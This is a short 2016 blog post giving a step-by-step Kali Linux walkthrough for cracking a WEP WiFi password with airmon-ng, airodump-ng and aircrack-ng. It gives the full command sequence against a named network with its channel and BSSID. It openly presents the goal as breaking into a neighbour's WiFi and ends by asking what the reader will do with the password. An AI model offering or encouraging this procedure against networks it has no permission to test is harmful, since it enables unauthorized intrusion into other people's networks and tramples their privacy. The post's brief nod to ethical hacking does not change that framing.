Tuesday, 22 March 2016

WEP - Airodump-ng & Aircrack-ng

You probably already know this but Kali Linux comes with a neat set of software called Aircrack-ng. This particular set of software is a godsend for us… penetration testers or ethical hackers.
Do you know how easy it is to crack WEP passwords with Kali Linux? The whole process takes about 10 to 15 minutes and usually never fails. WEP protection is outdated and weak. Kali Linux running Aircrack-ng makes short work of it. A few commands here and a few commands there and you have the WEP password of your neighbour in your hands. Make sure you put the WEP password to good use of course.
So, let’s begin hacking your neighbour’s WiFi’s WEP password!

> Cracking WEP passwords using Kali Linux
  1. Open up a Terminal window.
  2. Enter: airmon-ng
Note down the interface on which you want to start the monitoring. In my case it is wlan0 so I will be using wlan0. 

Enter: airmon-ng start wlan0 If the result looks like this: then your card is in monitor mode. 

Note down the monitoring interface’s name (“monitor mode enabled on mon0“). In my case it is mon0 so I will be using mon0.
Enter: airodump-ng mon0

My target is “mtnl” which is using WEP encryption and authentication. Wifi “mtnl” is working on channel 4 and BSSID (or bssid) is 0C:D2:B5:03:43:68. I will be using this information. 

Enter: airodump-ng –w mtnl-org –c 4 –bssid 0C:D2:B5:03:43:68 mon0 

After about 15,000 packets have been captured, enter: aircrack-ng mtnl-org-01.cap to start cracking the WEP password. 

> Conclusion

Well… that was pretty painless. The whole process may have taken around 10 minutes for me but it may vary for you. The rate of capture of packets largely depends on the network and the signal strength. Now you have your neighbour’s Wifi’s WEP password in your hands. What will you do with it?

No comments:

Post a Comment